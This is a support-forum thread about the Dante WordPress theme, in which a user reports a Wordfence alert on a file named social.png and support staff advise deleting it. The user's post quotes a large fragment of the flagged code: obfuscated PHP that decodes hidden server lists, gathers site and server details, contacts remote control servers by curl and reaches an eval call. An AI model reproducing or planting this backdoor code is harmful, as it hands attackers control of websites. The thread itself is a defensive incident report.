Wordfence Security Scan After Update "This file appears to be malicious"

[garymogford]

Hi I have just upgraded to the latest version of Dante and after a security scan by my Wordfence Plug In I am getting this “Critical” warning that the theme has Malicious Code.

I tried uploading the theme on to another test site and updated to the latest version and I am getting the same warning message.

Do you have any idea what could be the issue?

kind regards

Gary

This file appears to be malicious
Filename: wp-content/themes/dante/social.png
File type: Not a core, theme or plugin file.
Issue first detected: 12 mins ago.
Severity: Critical
Status New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is:

“str_rot13(strrev($gXNjWLFkUQOugyREMXKvZBfw))); } if (isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])) { $nGwzfuUZcelzyfJBQMIgkk = (int) ($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] / 100); if ($nGwzfuUZcelzyfJBQMIgkk == 0) { $nGwzfuUZcelzyfJBQMIgkk = 5; } else{ $nGwzfuUZcelzyfJBQMIgkk *= 5; } }else{ $nGwzfuUZcelzyfJBQMIgkk = 5; } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $nGwzfuUZcelzyfJBQMIgkk); } private function XsvsqpxlWxfKYiyUc($YJYRbBDIcUlLJwWidyuM) { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->oXyaqmHoChvHQFCvTluqmAC[’emails’] as $HWcwGasopLJSadVNNw){ $oXyaqmHoChvHQFCvTluqmAC[] = $HWcwGasopLJSadVNNw; } foreach ($this->aJQafHDwnaPrCJrQMjHVh as $HWcwGasopLJSadVNNw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($HWcwGasopLJSadVNNw))); } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $YJYRbBDIcUlLJwWidyuM); } private function KZdGlovqEtKYUSCqSVnK(){ $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC[‘host’] = $_SERVER[‘HTTP_HOST’]; $oXyaqmHoChvHQFCvTluqmAC[‘page’] = $_SERVER[‘REQUEST_URI’]; $oXyaqmHoChvHQFCvTluqmAC[‘ip’] = $_SERVER[‘SERVER_ADDR’]; $oXyaqmHoChvHQFCvTluqmAC[‘eval’] = $this->YrCTrfUzBfsVJKvqiYUeFbc(); $oXyaqmHoChvHQFCvTluqmAC[‘exec’] = $this->KNstTqErzZQBDQOODaJdLv(); $oXyaqmHoChvHQFCvTluqmAC[‘serverKey’] = $this->BkISKDyWWRXScnLPbTlyI(); $oXyaqmHoChvHQFCvTluqmAC[‘run’] = 0; $oXyaqmHoChvHQFCvTluqmAC[‘ver’] = ‘0.2a’; $oXyaqmHoChvHQFCvTluqmAC[‘started’] = date(‘Ymd’); $oXyaqmHoChvHQFCvTluqmAC[‘last_connect’] = date(‘Ymd’); $this->WbKPQMoSbMZkXUeYKXRIk = $oXyaqmHoChvHQFCvTluqmAC; return $oXyaqmHoChvHQFCvTluqmAC; } private function BkISKDyWWRXScnLPbTlyI($PVSXPKLAQGaWKUtNNUYQFoBuJE = 10) { $dqkdbOJPzAPsLsuxnjAStdXUDis = ‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’; $PqlpeiQHmZBwdmlsfEHmg = ”; for ($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < $PVSXPKLAQGaWKUtNNUYQFoBuJE; $BCEUSjHFFwzzqmHmpjjQI++) { $PqlpeiQHmZBwdmlsfEHmg .= $dqkdbOJPzAPsLsuxnjAStdXUDis[rand(0, strlen($dqkdbOJPzAPsLsuxnjAStdXUDis) – 1)]; } return $PqlpeiQHmZBwdmlsfEHmg; } public function KPBBXYwmuPGPaTyLhWevI(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (@$oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] < date(‘Ymd’)){ $oXyaqmHoChvHQFCvTluqmAC = $this->CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == false){ return; } else{ unset($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’]); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] = date(‘Ymd’); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘run’]++; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC){ $yYVsqvOoqWsddypXgJcIKOw = @$oXyaqmHoChvHQFCvTluqmAC[‘servers’]; $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($yYVsqvOoqWsddypXgJcIKOw, $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false){ return $uHrzRBdPUetDqbZAdw; } $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($this->HSxTktcbTftjZjKRHHmhr(), $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false) { return $uHrzRBdPUetDqbZAdw; } $this->XnpSvtOjNDRmxyfzaDKlGwM(); } private function tEiRFSJMSpXyxKKORPZClI($QrnkCEWRkHbQPoEPelYQRw, $oXyaqmHoChvHQFCvTluqmAC) { foreach ($QrnkCEWRkHbQPoEPelYQRw as $gXNjWLFkUQOugyREMXKvZBfw) { $uHrzRBdPUetDqbZAdw = $this->VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $oXyaqmHoChvHQFCvTluqmAC[‘info’], $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw != false) { if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’])){ $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] = 0; } if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]++; if (!isset($BCEUSjHFFwzzqmHmpjjQI)){ $BCEUSjHFFwzzqmHmpjjQI = (int)($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] / 5); } if ($BCEUSjHFFwzzqmHmpjjQI > 0) { $BCEUSjHFFwzzqmHmpjjQI–; continue; } } if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $uHrzRBdPUetDqbZAdw[‘info’][’empty’] = –$oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]; return $uHrzRBdPUetDqbZAdw; } } return false; } private function VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk, $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = false; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk); $OQijXfnrxWxPIcPSUibKEFmLE = $this->gTSiihhIRUNPkADDVdes($OQijXfnrxWxPIcPSUibKEFmLE); if ($OQijXfnrxWxPIcPSUibKEFmLE != false) { if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $OQijXfnrxWxPIcPSUibKEFmLE[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; return $OQijXfnrxWxPIcPSUibKEFmLE; } return false; } private function gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC){ if(!isset($this->WbKPQMoSbMZkXUeYKXRIk)){ $this->WbKPQMoSbMZkXUeYKXRIk = $this->oXyaqmHoChvHQFCvTluqmAC[‘info’]; } if (md5($this->WbKPQMoSbMZkXUeYKXRIk[‘serverKey’]) == $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = true; return true; } $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($oXyaqmHoChvHQFCvTluqmAC == false) { return false; } else{ if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘servers’])) { return false; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk = null,$BZaxGALPLdVfntBIQWUPs = null){ if (strstr($gXNjWLFkUQOugyREMXKvZBfw, $_SERVER[‘HTTP_HOST’]) || trim($gXNjWLFkUQOugyREMXKvZBfw) == ”) { return false; } if (isset($WbKPQMoSbMZkXUeYKXRIk)) { $BdlbpgzPBjxVLkBLnsrXkmI = json_encode($WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC($BdlbpgzPBjxVLkBLnsrXkmI); $WbKPQMoSbMZkXUeYKXRIk = array( “serverKey” => $WbKPQMoSbMZkXUeYKXRIk[‘serverKey’], “data” => $oXyaqmHoChvHQFCvTluqmAC[‘data’], “key” => $oXyaqmHoChvHQFCvTluqmAC[‘key’] ); } while (true){ $SCvWTGyfCYyeLdjcFFzobk = curl_init(); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_URL,”http://$gXNjWLFkUQOugyREMXKvZBfw&#8221;); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_RETURNTRANSFER,1); @curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRIk)) { curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRIk); } curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_CONNECTTIMEOUT,10); $oXyaqmHoChvHQFCvTluqmAC = curl_exec($SCvWTGyfCYyeLdjcFFzobk); curl_close($SCvWTGyfCYyeLdjcFFzobk); if (!strstr($oXyaqmHoChvHQFCvTluqmAC, “301 Moved Permanently”)) { break; } else{ preg_match_all(‘//’,$oXyaqmHoChvHQFCvTluqmAC,$NyFDhMvsSaUwvJsx); $gXNjWLFkUQOugyREMXKvZBfw = $NyFDhMvsSaUwvJsx[1][0]; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function aIIwgKgvtyRoWoMedUdbp($piiJbwvzLxHvKjlNnFzd, $oXyaqmHoChvHQFCvTluqmAC) { if (is_array($oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = json_encode($oXyaqmHoChvHQFCvTluqmAC); } $ilUTrmqGvQsBtZfyeBXfg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($ilUTrmqGvQsBtZfyeBXfg)) $oXyaqmHoChvHQFCvTluqmAC = json_decode($ilUTrmqGvQsBtZfyeBXfg, true); if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘key’]) || !isset($oXyaqmHoChvHQFCvTluqmAC[‘data’]) || strlen($oXyaqmHoChvHQFCvTluqmAC[‘key’]) == 0 || strlen($oXyaqmHoChvHQFCvTluqmAC[‘data’]) == 0 ) { die(); } update_option($piiJbwvzLxHvKjlNnFzd, $ilUTrmqGvQsBtZfyeBXfg); } private function McEnUjjQfaFzqGsihhU($piiJbwvzLxHvKjlNnFzd, $ysnqBUjsRbJDIlZaAE = false) { if (!$ysnqBUjsRbJDIlZaAE) { $oXyaqmHoChvHQFCvTluqmAC = get_option($piiJbwvzLxHvKjlNnFzd); }else{ $oXyaqmHoChvHQFCvTluqmAC = $piiJbwvzLxHvKjlNnFzd; } $GfNOeQGoTKggozAbXZAUpg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); return json_decode($GfNOeQGoTKggozAbXZAUpg, true); } private function YrCTrfUzBfsVJKvqiYUeFbc(){ $givBPiVtALrQjPLInUFKegOE = false; @eval(“.

[Kyle – SUPPORT]

Hi

There’s no social.png in my Dante folder, you can delete that file

– Kyle

[Mohammad – SUPPORT]

Hi,
Please delete current file and contact your hosting provider to make secure your website.
Thanks 🙂
With Best Regards
Mohammad

[garymogford]

Ok Mohammed

Thank you for that I have deleted the file & rescind and all ok

I just thought I should let you know as the issue only showed up when I upgraded to the latest version of Dante Theme

I tested it on some other test sites that I have and exactly the same thing happened when I upgraded and re scanned

So I just thought it might be an issue with the Dante update?

All seems ok know

Thank you

Gary

[Mohammad – SUPPORT]

Hi,
Thanks for this information and i will inform to developer of theme.
With Best Regards
Mohammad

[garymogford]

OK Thank you again for your help

[Mohammad – SUPPORT]

You most welcome.
Thanks 🙂
With Best Regards
Mohammad

[Swift Ideas – Ed]

@garymogford – thanks for letting us know, where did you get this update from?

– Ed

[garymogford]

Hi Ed

It came up in my wp dashboard that the theme was out of date so I clicked on update and everything seemed fine.

But then I got an email from my Wordfence Security plug in saying there was malicious code in the dante theme files (as attached in original email)

So I tested it again on my test site and it did the same thing.

So I thought it best to let you know as I assume the update I did came direct from you?

I have deleted the file & rescind it and all seems ok now but not sure how it got into your update.

Kind regards

Gary

[Swift Ideas – Ed]

Hi Gary,

I’ve checked and can’t see this in the update – but will investigate further. There is no file such as this in the current available files.

Thanks,

– Ed